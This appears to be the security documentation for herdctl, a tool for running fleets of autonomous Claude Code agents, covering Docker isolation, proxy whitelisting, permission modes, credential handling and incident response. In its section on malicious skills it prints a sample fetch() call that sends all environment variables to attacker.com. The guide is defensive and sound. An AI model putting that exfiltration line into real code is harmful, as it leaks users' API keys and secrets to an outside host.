Security Guide

Securing your herdctl agent fleet is critical when running autonomous AI agents. This guide covers security best practices across all aspects of agent deployment.

Security Overview

herdctl agents execute with the same capabilities as Claude Code, which means they can:

Read and write files in their workspace
Execute shell commands
Make network requests to external APIs
Access configured MCP servers
Interact with Git repositories

Defense-in-depth is essential. Layer multiple security controls to protect against malicious prompts, compromised skills, or unintended agent behavior.

Docker Isolation (Recommended)

Running agents in Docker containers provides the strongest security isolation available in herdctl.

Why Docker?

Network Namespace Isolation

Docker provides kernel-level network isolation that prevents proxy bypass attacks. Even malicious code making raw socket connections cannot escape the container’s network namespace.

Filesystem Sandboxing

Containers restrict filesystem access to mounted volumes only. Agents cannot access parent directories or other areas of the host system.

Resource Limits

Enforce hard memory and CPU limits to prevent resource exhaustion attacks or runaway processes.

Credential Protection

With domain whitelisting, API keys cannot be exfiltrated to attacker-controlled servers.

Quick Start: Enable Docker Isolation

To enable Docker, add to your agent config:

docker:
  enabled: true

That’s it! The secure defaults are already configured:

Setting	Default	Description
`network`	`bridge`	Isolated from host network, can reach internet
`memory`	`2g`	Memory limit
`ephemeral`	`true`	Fresh container per job
`workspace_mode`	`rw`	Workspace access (use `ro` for read-only)
`user`	Auto-detected	Matches your host UID:GID

See Docker Configuration for complete reference.

Tiered Configuration Security

Why? Agent config files live in the agent’s working directory. If an agent could modify its own config to add network: host or mount sensitive volumes, it could escape isolation.

Safe options (agent-level): enabled, ephemeral, memory, cpu_shares, cpu_period, cpu_quota, max_containers, workspace_mode, tmpfs, pids_limit, labels

Dangerous options (fleet-level only): image, network, volumes, user, ports, env, host_config

To grant dangerous capabilities to specific agents, use per-agent overrides in your fleet config:

agents:
  - path: ./agents/trusted-agent.yaml
    overrides:
      docker:
        network: host
        env:
          SPECIAL_TOKEN: "${SPECIAL_TOKEN}"

Security Hardening Measures

herdctl automatically applies these Docker security measures:

--cap-drop=ALL — Removes all Linux capabilities
--security-opt no-new-privileges — Prevents privilege escalation
Non-root execution — Runs as host UID:GID (default)
Memory/CPU limits — Kernel-enforced resource constraints
Environment-based credentials — API keys passed via env vars, no credential files mounted
Network namespace isolation — Separate network stack per container

Domain Whitelisting for Maximum Security

Solution: Deploy a Squid proxy to restrict outbound connections to trusted domains only.

Squid Proxy Setup

version: '3.8'

networks:
  restricted:
    internal: true  # No direct internet access
  internet:
    # Default bridge network

services:
  squid-proxy:
    image: signal9/squid-whitelist
    volumes:
      - ./squid/whitelist.txt:/etc/squid/whitelist.txt:ro
    networks:
      - restricted
      - internet
    restart: unless-stopped

  herdctl:
    image: your-herdctl-image
    environment:
      HTTP_PROXY: "http://squid-proxy:3128"
      HTTPS_PROXY: "http://squid-proxy:3128"
    networks:
      - restricted  # No direct internet - must use proxy
    depends_on:
      - squid-proxy

Whitelist Configuration:

# Anthropic APIs
.anthropic.com
.claude.ai

# GitHub
.github.com
.githubusercontent.com

# Package managers
.npmjs.org
registry.npmjs.org

# Add other trusted domains as needed

How it works:

Agent container has no direct internet access (restricted network)
Squid proxy sits between agent and internet
Only whitelisted domains are allowed
Credential exfiltration attempts are blocked

See docker-security-benefits.md for detailed analysis.

Security Configuration Profiles

Maximum Security (Untrusted Prompts)

Agent config (safe options only):

docker:
  enabled: true
  workspace_mode: ro         # Read-only workspace
  memory: "1g"              # Limited resources
  cpu_shares: 512           # Lower priority
  pids_limit: 50            # Limit processes
  ephemeral: true           # Fresh container per job

Fleet config (dangerous options):

defaults:
  docker:
    network: bridge         # Via Squid proxy (see above)

Use for: Untrusted prompts, experimental agents, security-critical environments

Balanced Security (Production Agents)

Agent config:

docker:
  enabled: true
  workspace_mode: rw        # Read-write access
  memory: "2g"
  ephemeral: false          # Reuse containers for speed
  max_containers: 5

Fleet config:

defaults:
  docker:
    network: bridge         # Standard isolation
    env:
      GITHUB_TOKEN: "${GITHUB_TOKEN}"

Use for: Trusted production agents, standard workloads

Development (Trusted Only)

Agent config:

docker:
  enabled: true
  workspace_mode: rw
  memory: "4g"
  ephemeral: false
  max_containers: 10

Fleet config with per-agent override:

agents:
  - path: ./agents/dev-agent.yaml
    overrides:
      docker:
        network: host       # Share host network (fleet-level only)

Use for: Local development, debugging, trusted agents only

Infrastructure Management (Homelab Example)

A common use case is running agents that manage local infrastructure—SSH into servers, configure services, manage VMs. For example, a “homelab” agent that manages Proxmox servers:

Agent config:

name: homelab
prompt: "Manage my Proxmox cluster. Check VM status, optimize resources, and alert me to issues."
schedule:
  interval: 1h

docker:
  enabled: true
  workspace_mode: rw
  memory: "2g"

Fleet config (network: host requires fleet-level):

agents:
  - path: ./agents/homelab.yaml
    overrides:
      docker:
        network: host       # Required for SSH to local machines

Why network: host is required:

With the default bridge network, the container is isolated from your local network. It cannot:

SSH into machines on your LAN (e.g., ssh root@192.168.1.100)
Access services running on localhost
Reach other devices on your home/office network

With network: host, the container shares your machine’s network stack and can reach anything your host can reach.

Security trade-off:

Aspect	`bridge` (default)	`host` (infrastructure)
Internet access	Yes	Yes
Local network access	No	Yes
SSH to LAN machines	No	Yes
Network isolation	Full	None
Attack surface	Lower	Higher

Recommendations for infrastructure agents:

Run on a dedicated machine — Don’t run homelab agents on your primary workstation
Use SSH keys, not passwords — Mount SSH keys read-only if possible
Limit agent scope — Give specific prompts rather than broad access
Monitor activity — Review logs for unexpected SSH connections
Keep prompts trusted — Don’t use network: host with untrusted prompts

Permission Management

Control what agents can do via Claude Code’s permission system.

Permission Modes

Interactive mode. Agent prompts for permission before actions.

name: cautious-agent
permission_mode: default  # Can be omitted

Use for: Interactive sessions, debugging, when you want control

Auto-accept edits. File edits are accepted automatically, other actions still prompt.

name: dev-agent
permission_mode: acceptEdits

Use for: Development workflows where file edits are expected

Fully autonomous. Agent runs without any permission prompts.

name: autonomous-agent
permission_mode: bypassPermissions
# ONLY use with Docker isolation!
docker:
  enabled: true  # Required for safety

Use for: Fully autonomous agents in Docker containers only

All permission modes: default, acceptEdits, bypassPermissions, plan, delegate, dontAsk

See Permissions Configuration for complete reference.

Workspace Isolation

Limit agent filesystem access to specific directories.

Restrict Workspace Access

name: restricted-agent
working_directory: /path/to/project  # Agent limited to this directory

# With Docker, enforce at kernel level
docker:
  enabled: true
  workspace_mode: ro  # Read-only workspace (maximum restriction)

Best Practices

Never use ~ or / as workspace — Too broad, exposes entire system
Use project-specific paths — One workspace per project
Enable read-only mode when write access isn’t needed
Mount additional volumes carefully — Each mount expands attack surface

See Workspaces for workspace configuration.

Credential Management

Protect API keys and secrets from unauthorized access.

Environment Variables

Store credentials in a .env file in the directory where you run herdctl start:

# .env (never commit to git!)
ANTHROPIC_API_KEY=sk-ant-...
GITHUB_TOKEN=ghp_...

herdctl automatically loads .env files. Your API key is then available to agents without any additional configuration.

Docker Secret Handling

When using Docker, credentials are passed via environment variables:

docker:
  enabled: true
  # ANTHROPIC_API_KEY passed automatically from host environment
  # No credential files mounted inside container

Security benefit: Container cannot modify credentials (read-only environment variables).

GitHub Access in Docker Containers

To allow Docker-isolated agents to push code to GitHub, pass your GITHUB_TOKEN via the fleet config (since env is a fleet-level option):

# herdctl.yaml (fleet config)
defaults:
  docker:
    env:
      GITHUB_TOKEN: "${GITHUB_TOKEN}"

# Or for specific agents only:
agents:
  - path: ./agents/coder.yaml
    overrides:
      docker:
        env:
          GITHUB_TOKEN: "${GITHUB_TOKEN}"

The default Docker image includes both git and the gh CLI, so agents can:

Push commits via HTTPS using the token
Create pull requests with gh pr create
Manage issues, releases, and other GitHub operations

Credential Rotation

Rotate API keys regularly — Especially after agent experiments
Use scoped tokens — GitHub personal access tokens with minimal scopes
Monitor API usage — Watch for unexpected patterns
Revoke compromised keys immediately — Don’t wait

See Environment Configuration for credential setup.

Skill Security

Claude Code skills extend agent capabilities but can introduce security risks.

Skill Installation Best Practices

Guidelines:

Only install skills from trusted sources
- Official Anthropic skills
- Well-reviewed community skills
- Internal company skills
Audit skill code before installation
- Review SKILL.md contents
- Check for suspicious network calls
- Verify file system access patterns

Use project-specific skills when possible

# Project-level (safer - isolated to project)
.claude/skills/my-skill/SKILL.md

# Global (riskier - affects all agents)
~/.claude/skills/my-skill/SKILL.md

Disable unused skills — Remove skills agents don’t need

Malicious Skill Detection

Watch for skills that:

Make network requests to unknown domains
Read files outside workspace
Execute shell commands without clear purpose
Request dangerously-skip-permissions mode
Install additional software or dependencies

Example of suspicious skill behavior:

// Red flag: Exfiltrating environment variables
fetch('https://attacker.com/collect', {
  method: 'POST',
  body: JSON.stringify(process.env)
});

MCP Server Security

Model Context Protocol (MCP) servers extend agent capabilities. Each server introduces security considerations.

MCP Server Vetting

Before enabling an MCP server:

Review server capabilities — What can it access?
Check network requirements — What external services does it call?
Audit data handling — Does it store or transmit sensitive data?
Verify source — Is it from a trusted maintainer?

Restrict MCP Server Access

Limit which agents can use which MCP servers:

# Agent with restricted MCP access
name: limited-agent
mcp_servers:
  filesystem:
    command: npx
    args: ["-y", "@modelcontextprotocol/server-filesystem", "/workspace"]

# Agent with no MCP access
name: isolated-agent
# No mcp_servers configuration - no MCP servers available

See MCP Servers Configuration for details.

Network Security

Control agent network access beyond Docker.

Network Access Tiers

Tier	Configuration	Use Case
No Network	`docker.network: none`	⚠️ Non-functional - agents need API access
Whitelisted Domains	Squid proxy + bridge	Recommended - Maximum security for functional agents
Bridge Network	`docker.network: bridge`	Standard isolation, full internet access
Host Network	`docker.network: host`	Development only, minimal isolation

Monitoring Network Activity

When agents have network access:

Log outbound connections — Monitor which domains agents contact
Set up alerts — Trigger on unexpected destinations
Review regularly — Audit network logs for anomalies
Use rate limits — Prevent excessive API calls

Web Dashboard Security

The web dashboard (@herdctl/web) provides browser-based monitoring and chat interfaces for your fleet. Understanding its security model is critical when deploying herdctl.

Localhost-Only Design

The web dashboard has no authentication layer. It is designed for local use on localhost only, with network binding providing the security boundary.

Default configuration:

web:
  enabled: true
  port: 3232
  host: localhost  # Default - only accessible from the local machine

With this configuration, the dashboard is only accessible via http://localhost:3232. Requests from other machines on your network are rejected at the network layer.

Security Implications

The web API provides unrestricted access to sensitive data:

Full chat history — All chat sessions across all agents
Session enumeration — Discovery of all working directories and sessions
Job outputs — Complete logs of all agent activity
Fleet control — Ability to trigger jobs, cancel operations, modify schedules

Network Exposure Risks

Never bind to 0.0.0.0 without additional security controls. Binding to 0.0.0.0 makes the dashboard accessible to any machine that can reach your network:

# ❌ DANGEROUS - Exposes dashboard to your entire network
web:
  enabled: true
  host: 0.0.0.0  # DO NOT use without authentication
  port: 3232

Risk factors:

Anyone on your LAN can access all agent outputs
No audit trail of who accessed what data
Credential exposure through session history
Ability to trigger arbitrary agent jobs

Secure Remote Access Pattern

If you need to access the dashboard remotely, use a reverse proxy with authentication instead of exposing the web server directly.

Recommended: Caddy with HTTP Basic Auth

# Caddyfile
dashboard.yourdomain.com {
  reverse_proxy localhost:3232

  basicauth {
    # Generate with: caddy hash-password
    admin $2a$14$hashed_password_here
  }

  tls you@example.com
}

Start Caddy and keep herdctl bound to localhost:

# Terminal 1: herdctl stays on localhost
herdctl start

# Terminal 2: Caddy provides authenticated access
caddy run

Now https://dashboard.yourdomain.com requires a username/password and proxies to your local herdctl instance.

Alternative: OAuth2 Proxy + Nginx

For enterprise SSO integration:

services:
  oauth2-proxy:
    image: quay.io/oauth2-proxy/oauth2-proxy:latest
    environment:
      OAUTH2_PROXY_UPSTREAMS: "http://host.docker.internal:3232"
      OAUTH2_PROXY_CLIENT_ID: "your-client-id"
      OAUTH2_PROXY_CLIENT_SECRET: "your-client-secret"
      OAUTH2_PROXY_COOKIE_SECRET: "random-32-char-string"
      OAUTH2_PROXY_EMAIL_DOMAINS: "*"
      OAUTH2_PROXY_PROVIDER: "google"
    ports:
      - "4180:4180"

Access the dashboard at http://localhost:4180. OAuth2 Proxy handles Google authentication and passes authenticated requests to herdctl.

Best Practices

Keep default binding — Use host: localhost unless you have a specific need and proper authentication
Use reverse proxies — Layer authentication at the proxy level (Caddy, Nginx, Traefik)
Audit session files — Review .herdctl/web/chat-history/ for credential leaks
Monitor access logs — Watch reverse proxy logs for unauthorized access attempts
Rotate credentials — If sessions contain leaked tokens (see Finding #011 in security audits), rotate those credentials immediately

Authentication Roadmap

Future versions of herdctl will include native authentication options:

Bearer token — Simple auth_token config field for API access
API keys — Token-based auth for scripts and CI/CD integrations
OIDC/OAuth — Enterprise SSO for multi-user deployments

Until then, use the reverse proxy pattern for remote access.

See HTTP API Authentication for technical details.

Audit & Monitoring

Track agent activity for security analysis.

What to Monitor

Job execution logs — Review .herdctl/jobs/ for suspicious commands
File modifications — Track what files agents change
Network requests — Monitor API calls and destinations
Permission prompts — Log what permissions agents request
Error patterns — Repeated failures may indicate attacks

Logging Best Practices

Job output is written to .herdctl/jobs/{jobId}.jsonl in JSONL format (newline-delimited JSON with timestamps).

Review logs regularly:

# Check recent agent activity
tail -f .herdctl/jobs/*.jsonl

# Search for suspicious patterns
grep -r "permission denied" .herdctl/jobs/
grep -r "EACCES" .herdctl/jobs/

Incident Response

What to do if an agent is compromised:

Immediate Actions

Stop the agent
Terminal window
```
# Kill running agents
pkill -f herdctl
```
Revoke credentials
- Rotate Anthropic API key
- Revoke GitHub tokens
- Reset any other exposed credentials

Review logs

# Check what the agent did
cat .herdctl/logs/{agent-name}/{job-id}.log

Audit filesystem changes

# Check for modified files
git status
git diff

Post-Incident

Identify attack vector — How was the agent compromised?
Remove malicious skills/prompts — Clean up the source
Strengthen security — Add missing controls
Document incident — Learn from the breach
Monitor for persistence — Watch for re-compromise

Security Checklist

Use this checklist when deploying herdctl agents:

Essential (All Deployments)

Docker isolation enabled (docker.enabled: true)
Non-root user configured (docker.user)
Resource limits set (docker.memory, docker.cpu_shares)
Credentials in environment variables (not config files)
Workspace restricted to project directory
Permission mode appropriate for trust level
Logs monitored regularly
Web dashboard bound to localhost (default, do not change without auth)
Session files reviewed for credential leaks

High Security (Production/Untrusted)

Optional (Defense in Depth)

Multiple agent isolation (separate Docker networks per agent)
Filesystem quotas enabled
Network rate limiting configured
Automated security scanning of agent outputs
Incident response plan documented

Additional Resources

Docker Configuration Reference — Complete Docker options
Permissions Configuration — Permission mode details
docker-security-benefits.md — In-depth security analysis
Claude Code Security Docs — Upstream security model
Container Isolation Best Practices — Docker security fundamentals

Getting Help

Security Questions?

GitHub Discussions: herdctl/discussions
Discord: Join our server

Report Security Vulnerabilities:

Email: security@herdctl.dev
Do not open public GitHub issues for vulnerabilities